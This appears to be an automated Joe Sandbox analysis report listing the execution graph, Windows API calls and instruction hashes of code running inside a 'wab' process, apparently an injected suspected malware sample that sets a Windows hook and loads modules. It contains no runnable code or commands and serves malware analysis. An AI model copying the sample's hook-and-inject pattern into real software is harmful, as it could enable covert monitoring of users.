                                                                          execution_graph 24446 2a72270 24447 2a722b4 SetWindowsHookExW 24446->24447 24449 2a722fa 24447->24449 24450 2a77370 DuplicateHandle 24451 2a77406 24450->24451 24452 2a4d0fc 24453 2a4d114 24452->24453 24454 2a4d16e 24453->24454 24459 24012bf7 24453->24459 24464 24012c08 24453->24464 24469 24013d78 24453->24469 24478 24013d68 24453->24478 24460 24012c2e 24459->24460 24462 24013d68 CallWindowProcW 24460->24462 24463 24013d78 CallWindowProcW 24460->24463 24461 24012c4f 24461->24454 24462->24461 24463->24461 24465 24012c2e 24464->24465 24467 24013d68 CallWindowProcW 24465->24467 24468 24013d78 CallWindowProcW 24465->24468 24466 24012c4f 24466->24454 24467->24466 24468->24466 24470 24013da5 24469->24470 24471 24013dd9 24470->24471 24473 24013dc9 24470->24473 24474 24013dd7 24471->24474 24503 240139ec 24471->24503 24487 24013ef0 24473->24487 24492 24013fcc 24473->24492 24498 24013f00 24473->24498 24481 24013da5 24478->24481 24479 24013dd9 24480 240139ec CallWindowProcW 24479->24480 24483 24013dd7 24479->24483 24480->24483 24481->24479 24482 24013dc9 24481->24482 24484 24013ef0 CallWindowProcW 24482->24484 24485 24013f00 CallWindowProcW 24482->24485 24486 24013fcc CallWindowProcW 24482->24486 24484->24483 24485->24483 24486->24483 24488 24013f14 24487->24488 24507 24013fa9 24488->24507 24511 24013fb8 24488->24511 24489 24013fa0 24489->24474 24493 24013f8a 24492->24493 24494 24013fda 24492->24494 24496 24013fa9 CallWindowProcW 24493->24496 24497 24013fb8 CallWindowProcW 24493->24497 24495 24013fa0 24495->24474 24496->24495 24497->24495 24499 24013f14 24498->24499 24501 24013fa9 CallWindowProcW 24499->24501 24502 24013fb8 CallWindowProcW 24499->24502 24500 24013fa0 24500->24474 24501->24500 24502->24500 24504 240139f7 24503->24504 24505 2401523a CallWindowProcW 24504->24505 24506 240151e9 24504->24506 24505->24506 24506->24474 24508 24013fb8 24507->24508 24509 24013fc9 24508->24509 24514 24015170 24508->24514 24509->24489 24512 24013fc9 24511->24512 24513 24015170 CallWindowProcW 24511->24513 24512->24489 24513->24512 24514->24514 24515 24015173 24514->24515 24516 240139ec CallWindowProcW 24515->24516 24517 2401518a 24516->24517 24517->24509 24436 2a77128 24437 2a7716e GetCurrentProcess 24436->24437 24439 2a771c0 GetCurrentThread 24437->24439 24440 2a771b9 24437->24440 24441 2a771f6 24439->24441 24442 2a771fd GetCurrentProcess 24439->24442 24440->24439 24441->24442 24445 2a77233 24442->24445 24443 2a7725b GetCurrentThreadId 24444 2a7728c 24443->24444 24445->24443 24518 2a77988 24521 2a779b6 24518->24521 24520 2a779d6 24522 2a76f24 24521->24522 24524 2a76f2f 24522->24524 24523 2a784fc 24525 2a78557 24523->24525 24534 24017a20 24523->24534 24538 24017a30 24523->24538 24524->24523 24524->24525 24529 2a7a280 24524->24529 24525->24520 24530 2a7a2a1 24529->24530 24531 2a7a2c5 24530->24531 24542 2a7a430 24530->24542 24546 2a7a41f 24530->24546 24531->24523 24536 24017a95 24534->24536 24535 24017ef8 WaitMessage 24535->24536 24536->24535 24537 24017ae2 24536->24537 24537->24525 24539 24017a95 24538->24539 24540 24017ae2 24539->24540 24541 24017ef8 WaitMessage 24539->24541 24540->24525 24541->24539 24543 2a7a43d 24542->24543 24545 2a7a476 24543->24545 24550 2a7814c 24543->24550 24545->24531 24547 2a7a43d 24546->24547 24548 2a7a476 24547->24548 24549 2a7814c 6 API calls 24547->24549 24548->24531 24549->24548 24552 2a78157 24550->24552 24551 2a7a4e8 24552->24551 24554 2a78180 24552->24554 24555 2a7818b 24554->24555 24561 2a78190 24555->24561 24557 2a7a557 24565 24010520 24557->24565 24574 24010538 24557->24574 24558 2a7a591 24558->24551 24564 2a7819b 24561->24564 24562 2a7bad8 24562->24557 24563 2a7a280 6 API calls 24563->24562 24564->24562 24564->24563 24567 24010569 24565->24567 24568 24010669 24565->24568 24566 24010575 24566->24558 24567->24566 24583 240107a0 24567->24583 24587 240107b0 24567->24587 24568->24558 24569 240105b5 24590 24011b10 24569->24590 24594 24011b20 24569->24594 24576 24010569 24574->24576 24577 24010669 24574->24577 24575 24010575 24575->24558 24576->24575 24579 240107a0 4 API calls 24576->24579 24580 240107b0 4 API calls 24576->24580 24577->24558 24578 240105b5 24581 24011b10 2 API calls 24578->24581 24582 24011b20 2 API calls 24578->24582 24579->24578 24580->24578 24581->24577 24582->24577 24584 240107b0 24583->24584 24598 240107f0 24584->24598 24585 240107ba 24585->24569 24589 240107f0 4 API calls 24587->24589 24588 240107ba 24588->24569 24589->24588 24591 24011b4b 24590->24591 24592 24011bfa 24591->24592 24633 240129f0 24591->24633 24595 24011b4b 24594->24595 24596 24011bfa 24595->24596 24597 240129f0 2 API calls 24595->24597 24596->24596 24597->24596 24599 24010811 24598->24599 24601 2401082c 24598->24601 24606 24010a40 24599->24606 24610 24010a39 24599->24610 24600 2401081c 24600->24601 24615 24010ad9 24600->24615 24620 24010ae8 24600->24620 24601->24585 24607 24010a82 24606->24607 24608 24010a88 GetModuleHandleW 24606->24608 24607->24608 24609 24010ab5 24608->24609 24609->24600 24611 24010a24 24610->24611 24612 24010a3f GetModuleHandleW 24610->24612 24611->24600 24614 24010ab5 24612->24614 24614->24600 24617 24010ae8 24615->24617 24616 24010b21 24616->24601 24617->24616 24625 24010cc1 24617->24625 24629 24010cc8 24617->24629 24622 24010afc 24620->24622 24621 24010b21 24621->24601 24622->24621 24623 24010cc1 LoadLibraryExW 24622->24623 24624 24010cc8 LoadLibraryExW 24622->24624 24623->24621 24624->24621 24626 24010cc8 LoadLibraryExW 24625->24626 24628 24010d41 24626->24628 24628->24616 24630 24010d10 LoadLibraryExW 24629->24630 24631 24010d0a 24629->24631 24632 24010d41 24630->24632 24631->24630 24632->24616 24637 24012a50 24633->24637 24641 24012a44 24633->24641 24638 24012ab8 CreateWindowExW 24637->24638 24640 24012b74 24638->24640 24642 24012a50 CreateWindowExW 24641->24642 24644 24012b74 24642->24644 24644->24644

                                                                          Executed Functions

                                                                          Function 24017A30 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 374 24017a30-24017a93 375 24017ac2-24017ae0 374->375 376 24017a95-24017abf 374->376 381 24017ae2-24017ae4 375->381 382 24017ae9-24017b20 375->382 376->375 384 24017fa2-24017fb7 381->384 386 24017f51 382->386 387 24017b26-24017b3a 382->387 390 24017f56-24017f6c 386->390 388 24017b69-24017b88 387->388 389 24017b3c-24017b66 387->389 396 24017ba0-24017ba2 388->396 397 24017b8a-24017b90 388->397 389->388 390->384 398 24017bc1-24017bca 396->398 399 24017ba4-24017bbc 396->399 401 24017b92 397->401 402 24017b94-24017b96 397->402 403 24017bd2-24017bd9 398->403 399->390 401->396 402->396 404 24017be3-24017bea 403->404 405 24017bdb-24017be1 403->405 407 24017bf4 404->407 408 24017bec-24017bf2 404->408 406 24017bf7-24017c0d call 24016998 405->406 410 24017c12-24017c14 406->410 407->406 408->406 411 24017d69-24017d6d 410->411 412 24017c1a-24017c21 410->412 413 24017d73-24017d77 411->413 414 24017f3c-24017f4f 411->414 412->386 415 24017c27-24017c64 412->415 416 24017d91-24017d9a 413->416 417 24017d79-24017d8c 413->417 414->390 423 24017f32-24017f36 415->423 424 24017c6a-24017c6f 415->424 419 24017dc9-24017dd0 416->419 420 24017d9c-24017dc6 416->420 417->390 421 24017dd6-24017ddd 419->421 422 24017e6f-24017e84 419->422 420->419 425 24017e0c-24017e2e 421->425 426 24017ddf-24017e09 421->426 422->423 438 24017e8a-24017e8c 422->438 423->403 423->414 427 24017ca1-24017cb6 call 240169bc 424->427 428 24017c71-24017c7f call 240169a4 424->428 425->422 465 24017e30-24017e3a 425->465 426->425 436 24017cbb-24017cbf 427->436 428->427 439 24017c81-24017c9f call 240169b0 428->439 440 24017cc1-24017cd3 call 240169c8 436->440 441 24017d30-24017d3d 436->441 442 24017ed9-24017ef6 call 24016998 438->442 443 24017e8e-24017ec7 438->443 439->436 466 24017d13-24017d2b 440->466 467 24017cd5-24017d05 440->467 441->423 458 24017d43-24017d4d call 240169d8 441->458 442->423 457 24017ef8-24017f24 WaitMessage 442->457 454 24017ed0-24017ed7 443->454 455 24017ec9-24017ecf 443->455 454->423 455->454 462 24017f26 457->462 463 24017f2b 457->463 471 24017d5c-24017d64 call 240169f0 458->471 472 24017d4f-24017d57 call 240169e4 458->472 462->463 463->423 473 24017e52-24017e6d 465->473 474 24017e3c-24017e42 465->474 466->390 482 24017d07 467->482 483 24017d0c 467->483 471->423 472->423 473->422 473->465 479 24017e44 474->479 480 24017e46-24017e48 474->480 479->473 480->473 482->483 483->466
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ad2073421b9d0876116a8dfb2d963f090747bcadd7a22fee1bbe37de55e8751
                                                                          • Instruction ID: 9a879739ad9493540d884cca21afb285599d642830fc46435ed81b6adb0b1f53
                                                                          • Opcode Fuzzy Hash: 5ad2073421b9d0876116a8dfb2d963f090747bcadd7a22fee1bbe37de55e8751
                                                                          • Instruction Fuzzy Hash: 19F13D34A00609CFDB04DFA5C984B9EBBF2BF88314F158569E409AF295DB74E985CF81
                                                                          Function 02A77125 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 02A771A6
                                                                          • GetCurrentThread.KERNEL32 ref: 02A771E3
                                                                          • GetCurrentProcess.KERNEL32 ref: 02A77220
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02A77279
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: b18375c4d112b90f2ae4e21dc14dfe1e90f95202c804605aeee331d16e471955
                                                                          • Instruction ID: e1bb774c608e00c566f36dfcefc764497cd8903c5c3b5f4de0fef95ede7d6da3
                                                                          • Opcode Fuzzy Hash: b18375c4d112b90f2ae4e21dc14dfe1e90f95202c804605aeee331d16e471955
                                                                          • Instruction Fuzzy Hash: 085135B0900609CFDB14CFAAD988B9EFBF1AF88304F208559E419A73A0DB756945CB65
                                                                          Function 02A77128 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 02A771A6
                                                                          • GetCurrentThread.KERNEL32 ref: 02A771E3
                                                                          • GetCurrentProcess.KERNEL32 ref: 02A77220
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02A77279
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 5d395365847faf54b43c3f859cb3ca72b59cd492b0c5ea23f5e041821918de02
                                                                          • Instruction ID: 6598da69b00b7025e8c8d76eb18e9f1f0c0cf180e33ce12059af6ab01ddb053c
                                                                          • Opcode Fuzzy Hash: 5d395365847faf54b43c3f859cb3ca72b59cd492b0c5ea23f5e041821918de02
                                                                          • Instruction Fuzzy Hash: 415135B0900709CFDB14CFAAD988B9EFBF1AF49304F208459E419A7360DB75A945CBA5
                                                                          Function 24012A44 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 486 24012a44-24012ab6 488 24012ac1-24012ac8 486->488 489 24012ab8-24012abe 486->489 490 24012ad3-24012b72 CreateWindowExW 488->490 491 24012aca-24012ad0 488->491 489->488 493 24012b74-24012b7a 490->493 494 24012b7b-24012bb3 490->494 491->490 493->494 498 24012bc0 494->498 499 24012bb5-24012bb8 494->499 500 24012bc1 498->500 499->498 500->500
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24012B62
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 64f3fbfccd51cf2f3619f8e1ad669baf032349b2cab06d193e25a532cbcd56d0
                                                                          • Instruction ID: 60748c5199b84419d6b6fe4df23481797171700b20da20e8d12433b9433fe714
                                                                          • Opcode Fuzzy Hash: 64f3fbfccd51cf2f3619f8e1ad669baf032349b2cab06d193e25a532cbcd56d0
                                                                          • Instruction Fuzzy Hash: 6851BFB1D102499FDB14CF9AC880ADEBBB5FF49310F64812EE819AB250D775A981CF90
                                                                          Function 24012A50 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 501 24012a50-24012ab6 502 24012ac1-24012ac8 501->502 503 24012ab8-24012abe 501->503 504 24012ad3-24012b72 CreateWindowExW 502->504 505 24012aca-24012ad0 502->505 503->502 507 24012b74-24012b7a 504->507 508 24012b7b-24012bb3 504->508 505->504 507->508 512 24012bc0 508->512 513 24012bb5-24012bb8 508->513 514 24012bc1 512->514 513->512 514->514
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 24012B62
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: e22bcad016f47fd585b72f8e1a30c4f3b00a1a289493c95fa02fdede4dfdf427
                                                                          • Instruction ID: 3441c2cff5ba51868028efb7d3d9e6ad3c7250e632860f3c6613bfd30427c4f5
                                                                          • Opcode Fuzzy Hash: e22bcad016f47fd585b72f8e1a30c4f3b00a1a289493c95fa02fdede4dfdf427
                                                                          • Instruction Fuzzy Hash: 7E41A0B1D003499FDB14CF99C880ADEBBB5BF49310F64812EE819AB250D775A985CF90
                                                                          Function 240139EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 515 240139ec-240151dc 518 240151e2-240151e7 515->518 519 2401528c-240152ac 515->519 520 240151e9-24015220 518->520 521 2401523a-24015272 CallWindowProcW 518->521 526 240152af-240152bc 519->526 527 24015222-24015228 520->527 528 24015229-24015238 520->528 522 24015274-2401527a 521->522 523 2401527b-2401528a 521->523 522->523 523->526 527->528 528->526
                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 24015261
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: dbdb2e31b12370f5c4d0a96659712b437a11cc3da1f17d4fd08df3037dd2b11f
                                                                          • Instruction ID: 79ac8c621cb3fd64dc3761b9f59c285895c135a44f28a646911e48424e594476
                                                                          • Opcode Fuzzy Hash: dbdb2e31b12370f5c4d0a96659712b437a11cc3da1f17d4fd08df3037dd2b11f
                                                                          • Instruction Fuzzy Hash: 75412BB9A00205CFDB04CF95C484A9EBBF5FF89310F25C599E519AB361D374A941CFA1
                                                                          Function 02A77368 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 531 2a77368-2a7736d 532 2a77340-2a7735c 531->532 533 2a7736f-2a77404 DuplicateHandle 531->533 534 2a77406-2a7740c 533->534 535 2a7740d-2a7742a 533->535 534->535
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A773F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 7ef1499e15343f697c4046918e440a7ce2d75e19e676943284d7337671cb7c5a
                                                                          • Instruction ID: 43dfe50435013ce1e349cccee66bc6e7b343f1a00c6175732f07a8f74013b09c
                                                                          • Opcode Fuzzy Hash: 7ef1499e15343f697c4046918e440a7ce2d75e19e676943284d7337671cb7c5a
                                                                          • Instruction Fuzzy Hash: D13118B6D00248DFDB10CFA9D984AEEBBF5EB88310F10805AE914A7350C3789954CFA5
                                                                          Function 02A77370 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 540 2a77370-2a77404 DuplicateHandle 541 2a77406-2a7740c 540->541 542 2a7740d-2a7742a 540->542 541->542
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A773F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 3ac0c6affc5b15eb6b98e9af21f12a58b964114748024fcee5f54ed7894d778b
                                                                          • Instruction ID: ce361780d22983a6f28297ecc2f18727739902c7d1b81c80c8657b22c3c04fb7
                                                                          • Opcode Fuzzy Hash: 3ac0c6affc5b15eb6b98e9af21f12a58b964114748024fcee5f54ed7894d778b
                                                                          • Instruction Fuzzy Hash: 1521E4B5D002499FDB10CFAAD984ADEFBF4EB48310F14805AE954A3350D374A954CFA5
                                                                          Function 02A72268 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 545 2a72268-2a722ba 547 2a722c6-2a722f8 SetWindowsHookExW 545->547 548 2a722bc 545->548 549 2a72301-2a72326 547->549 550 2a722fa-2a72300 547->550 551 2a722c4 548->551 550->549 551->547
                                                                          APIs
                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02A722EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: aeb6b8f3dbaea9b94db1f0d2a44ad7ffac1628aca5f9a91b28bc0579683d7792
                                                                          • Instruction ID: bf5eeef8225add02b38dbeb4d1ca36232267ba8a22ffd65e858bedc2a9414a07
                                                                          • Opcode Fuzzy Hash: aeb6b8f3dbaea9b94db1f0d2a44ad7ffac1628aca5f9a91b28bc0579683d7792
                                                                          • Instruction Fuzzy Hash: 96213575D002098FDB10CFA9C984BEEFBF5AF89310F14842AD859A7250C775A945CFA5
                                                                          Function 02A72270 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 555 2a72270-2a722ba 557 2a722c6-2a722f8 SetWindowsHookExW 555->557 558 2a722bc 555->558 559 2a72301-2a72326 557->559 560 2a722fa-2a72300 557->560 561 2a722c4 558->561 560->559 561->557
                                                                          APIs
                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02A722EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2576021410.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HookWindows
                                                                          • String ID:
                                                                          • API String ID: 2559412058-0
                                                                          • Opcode ID: 3d38e23652ba9df6f1a4cff2341e993d6bb492dac90c9c201d7c8ab1fda7bef3
                                                                          • Instruction ID: 5b046d751a1f3df5589c872a1e09ba03a48479ed16fdeaa77c4b68743a4e602e
                                                                          • Opcode Fuzzy Hash: 3d38e23652ba9df6f1a4cff2341e993d6bb492dac90c9c201d7c8ab1fda7bef3
                                                                          • Instruction Fuzzy Hash: F42113B1D002099FDB14CFAAC944BEEFBF5AF89310F14842AD459A7250CB75A944CFA5
                                                                          Function 24010CC1 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 574 24010cc1-24010d08 576 24010d10-24010d3f LoadLibraryExW 574->576 577 24010d0a-24010d0d 574->577 578 24010d41-24010d47 576->578 579 24010d48-24010d65 576->579 577->576 578->579
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 24010D32
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 822c4463a2636baed8048d68fda5390c2ed94de15c2450bf4d53815f6caec96f
                                                                          • Instruction ID: d60967dd3462110dfeac240eba4e142e6db23e2135b8021a3ae14dacd1f13cfb
                                                                          • Opcode Fuzzy Hash: 822c4463a2636baed8048d68fda5390c2ed94de15c2450bf4d53815f6caec96f
                                                                          • Instruction Fuzzy Hash: 951114B69002498FDB10CFAAD484BDEFBF4EF48310F10846AE569A7610C379A545CFA1
                                                                          Function 24010A39 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 565 24010a39-24010a3d 566 24010a24-24010a2c 565->566 567 24010a3f-24010a80 565->567 569 24010a82-24010a85 567->569 570 24010a88-24010ab3 GetModuleHandleW 567->570 569->570 571 24010ab5-24010abb 570->571 572 24010abc-24010ad0 570->572 571->572
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 24010AA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 93ad6313dcc019594e23cfd15a9de83b5034057b251c679e588152803b063ea9
                                                                          • Instruction ID: baa77dc7961666252865987791629b55d537ff853ee32859eab08ec25dc98dfa
                                                                          • Opcode Fuzzy Hash: 93ad6313dcc019594e23cfd15a9de83b5034057b251c679e588152803b063ea9
                                                                          • Instruction Fuzzy Hash: D11123B6D006498FCB10CF9AD440ADEFBF4EF89320F10816AD559B7610C379A585CFA1
                                                                          Function 24010CC8 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 24010D32
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 280ddc36b32083ee674d3dfae3f880f2352c74d09c113941db0c522fe4d0f48f
                                                                          • Instruction ID: 8a001e9addd54e4fa627c5bb5ea1c6d88b92347f374fa70845143c0fa8fb0ca5
                                                                          • Opcode Fuzzy Hash: 280ddc36b32083ee674d3dfae3f880f2352c74d09c113941db0c522fe4d0f48f
                                                                          • Instruction Fuzzy Hash: 5F11F3B6D002498FDB10CF9AD444ADEFBF4AF89310F10842ED559A7600C3B9A545CFA5
                                                                          Function 24010A40 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 24010AA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2596233080.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_24010000_wab.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 6278b824eefd553d8b84d3b88dcd1e296270e03f9138236e410287e43a39c126
                                                                          • Instruction ID: cb007098c7a12619438498bfeace110f1f1467b442ef810165ee55ceda43e536
                                                                          • Opcode Fuzzy Hash: 6278b824eefd553d8b84d3b88dcd1e296270e03f9138236e410287e43a39c126
                                                                          • Instruction Fuzzy Hash: F11110B5C006498FDB10CF9AC440BDEFBF4AF89220F10842AD959B7610D379A585CFA1
                                                                          Function 02A3D500 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575031903.0000000002A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A3D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a3d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c3ec0ce2540b11156136f25aa2d69df2d9e187fa429e65b3a6947dbd247e63c7
                                                                          • Instruction ID: 719af658523c6f0ba708ec34355ed033ee51cbf45eae63700ce6ac59cc92ac86
                                                                          • Opcode Fuzzy Hash: c3ec0ce2540b11156136f25aa2d69df2d9e187fa429e65b3a6947dbd247e63c7
                                                                          • Instruction Fuzzy Hash: 88212572504744DFDF16DF10D9C0B26BF65FB88318F248569F80A0B246CB36D856CBA2
                                                                          Function 02A3D414 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575031903.0000000002A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A3D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a3d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5ca3d084c059b6a4e7d71dc1570fbde482279846deb873876a9e9189f2c835d
                                                                          • Instruction ID: 5e3146a9bb0a9d78021ef3e862c924225b83ffdd5e5172a86a48971c5032d039
                                                                          • Opcode Fuzzy Hash: e5ca3d084c059b6a4e7d71dc1570fbde482279846deb873876a9e9189f2c835d
                                                                          • Instruction Fuzzy Hash: 6821F571504744EFDB1ADF10D9C0F26BF65FB88324F24C569E8094B256C736E456CBA2
                                                                          Function 02A4D0FC Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575334475.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a4d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
